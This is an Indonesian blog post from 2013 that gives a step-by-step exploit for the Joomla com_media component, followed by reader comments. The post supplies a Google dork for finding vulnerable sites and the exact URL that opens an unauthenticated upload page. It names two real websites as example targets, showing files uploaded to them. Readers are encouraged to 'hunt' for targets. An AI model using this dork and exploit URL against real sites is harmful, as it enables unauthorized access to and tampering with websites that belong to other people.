Teknik Exploit Com_Media pada CMS Joomla

May 15, 2013 by Jack Wilder 28 Comments

Teknik Exploit Com_Media pada CMS Joomla – Kali ini saya akan share salah satu cara exploit pada CMS Joomla yaitu Exploit com_media. Teknik ini saya dapet saat baca-baca blog salah satu member ISD, yaitu SultanHaikal. Namun sayang sekarang blognya sudah dihapus. Jadi saya mencoba berbagi ulang disini.
Oke, langsung saja.
Bahan-bahan :
Dork : inurl:com_media site:com [dork silahkan kreasikan sendiri. Kraetfitas anda yang akan menetukan banyaknya situs vuln]. :p
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

1. Oke. Langsung berburu target di google dengan dork diatas. Sebagai contoh, saya pilih http://www.skylinepark.org .
2. Lalu masukkan exploitnya. Jadi http://www.skylinepark.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. Maka kalian akan melihat tempat upload. Lihat SS :

4. Yang bisa diupload adalah file .txt .jpg .gif .png. Untuk html dan php tidak bisa. :p . Saya coba upload file .txt
5. Sekarang, kita lihat hasilnya. Letak filenya di [localhost]/images/[file.txt].
Ex : http://www.skylinepark.org/images/lol.txt, http://www.magicrete.in/images/lol.txt
6. Done.

Refrensi : http://komandanseo.blogspot.com/

Comments

ope says

May 16, 2013 at 12:58 am

Exploit com_media itu apa ya?

Reply
- chiaki says
  
  May 16, 2013 at 4:35 am
  
  ???
  
  Reply
- Agung Skat Nevis says
  
  May 16, 2013 at 11:27 am
  
  Visit back 😀
  And izin copassss =)
  
  http://www.bloggerjava.net/
  
  Reply
Wahyu Dwi says

May 16, 2013 at 1:08 am

rada nggak mudeng sob sama joomla 😀 hhehehe tapi pelan2 aja deh blajarnya 🙂

Reply
- chiaki says
  
  May 16, 2013 at 4:36 am
  
  Sip.
  
  Reply
Bung Penho says

May 16, 2013 at 2:08 am

kalo bisa lebih rinci lagi nih tentang teknik ini buat apa?

Reply
- chiaki says
  
  May 16, 2013 at 4:37 am
  
  Ini post nya di label apa ? :p
  
  Reply
Info Seputar Bola says

May 16, 2013 at 3:16 am

terimakasih sudah berbagi nih mas . rupanya bugs nya cukup mudah untuk d tembuss ..

Reply
- chiaki says
  
  May 17, 2013 at 1:19 am
  
  Benar sob.
  
  Reply
Rohis Facebook says

May 16, 2013 at 3:53 am

nyimak aja deh gk bs komen apa2 soalx gk ngerti *smile

Reply
- chiaki says
  
  May 17, 2013 at 1:20 am
  
  Oke.
  
  Reply
imam sya' roni says

May 16, 2013 at 7:04 am

meneruskan warisan nih kang dari sultan haikal 🙂 sipp

Reply
- chiaki says
  
  May 17, 2013 at 1:22 am
  
  Thanks bro.
  
  Reply
mifta khuddin says

May 16, 2013 at 8:25 am

mengapa php dan html gk bisa d'upload..??

Reply
- chiaki says
  
  May 17, 2013 at 1:20 am
  
  Gak tau. :3
  
  Reply
Mas Nady says

May 16, 2013 at 9:12 am

kunjungan sore, nyimak saja dech sobat… nggak paham, hahahaha

Reply
Muroi El-Barezy says

May 16, 2013 at 9:17 am

Wah joomla, kayanya nyimak dulu sob, happy blogging

Reply
aji Fauzan says

May 16, 2013 at 10:22 am

mantep gan (y)

Reply
Djangkaru Bumi says

May 16, 2013 at 1:58 pm

saya belajar joomla jadi pening sendiri.

Reply
Muhammad Rafly says

May 16, 2013 at 2:31 pm

Gan Tukeran Link Yuk..
Dah Ane Pasang Link Madura Di Blog Ane Cek Yo..
http://mrr-cyber.blogspot.com/p/link-exchange_1033.html

Reply
- chiaki says
  
  May 17, 2013 at 2:23 am
  
  Ntar malem ya bro. Skrg ol hp. :3
  
  Reply
- Muhammad Rafly says
  
  May 17, 2013 at 6:36 am
  
  Oke Gan..
  
  Reply
Wahyu Dwi says

May 17, 2013 at 2:58 am

kunjungan pagi sob 🙂

Reply
Cirebon-Cyber4rt says

May 17, 2013 at 11:08 am

paling suka ane kalo post gini hehehe 😀

oh iya lama juga ngga BW dimari, apa kabar gan? 🙂

Reply
- chiaki says
  
  May 18, 2013 at 5:00 am
  
  Baik bro. 😀
  
  Reply
Mas Nady says

May 17, 2013 at 12:58 pm

wah saya nyimak saja dech sob.. saya masih awam banget sama yang beginian hehehehe

Reply
Anonim says

May 30, 2013 at 4:57 pm

Blog Cacad

Reply
- Anonim says
  
  June 5, 2013 at 8:20 am
  
  asu
  
  Reply

Reader Interactions

Comments

Leave a Reply Cancel reply